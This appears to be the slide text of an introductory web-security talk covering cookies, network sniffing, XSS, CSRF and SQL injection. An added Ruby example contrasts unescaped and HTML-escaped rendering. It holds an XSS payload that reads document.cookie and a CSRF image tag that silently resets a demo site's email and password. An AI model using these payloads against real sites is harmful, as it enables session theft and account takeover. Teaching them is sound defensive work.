#badhax
Social Engineering
Cookies
How websites remember you
Seven Layers of Networks
Open Systems Interconnection (OSI) model
Ok, so Wireshark
First person to hack me gets 5cɃ
Second person to hack me gets 5cɃ
Firesheep
(baaaa)
Protect Yourself with
a VPN
Building a site?
Use HTTPS everywhere
XSS
Cross-Site Scripting
<input type="search" name="q" value="harper">
<input type="search" name="q" value="
"><script>
alert(document.cookie)
</script><input type="hidden
">
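Added example, not from the original slides: the search box above rendered with and without HTML-escaping of the q value, fed the payload shown on the slide. The function names and the choice of Ruby with ERB::Util are assumptions made for illustration.

```ruby
require 'erb'

# Payload from the slide: closes the value attribute and the <input> tag,
# then opens a <script> element.
PAYLOAD = %q{"><script>alert(document.cookie)</script><input type="hidden}

# Vulnerable rendering (hypothetical helper): q is pasted into the
# attribute as-is, so a double quote in q ends the attribute early.
def render_unsafe(q)
  '<input type="search" name="q" value="' + q + '">'
end

# Hardened rendering (hypothetical helper): & < > " ' become entities,
# so the browser treats the whole of q as attribute text.
def render_safe(q)
  '<input type="search" name="q" value="' + ERB::Util.html_escape(q) + '">'
end

# Rough check for review or tests: names of the tags opened in the markup.
# A real browser parser is more lenient; this only shows the difference.
def tags_in(html)
  html.scan(/<\s*([a-zA-Z][a-zA-Z0-9]*)/).flatten.map(&:downcase)
end

puts render_unsafe(PAYLOAD)
puts tags_in(render_unsafe(PAYLOAD)).inspect
puts render_safe(PAYLOAD)
puts tags_in(render_safe(PAYLOAD)).inspect
```
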
X-Xss-Protection: 0
Making it last
XSRF/CSRF
Cross-Site Request Forgery
<form action="/users/dumb_update" method="get">
<img src="http://catmeanings.herokuapp.com/users/dumb_update?user[email]=lol%40lol.lol&user[password]=p0wned&user[password_confirmation]=p0wned" />
SQL Injection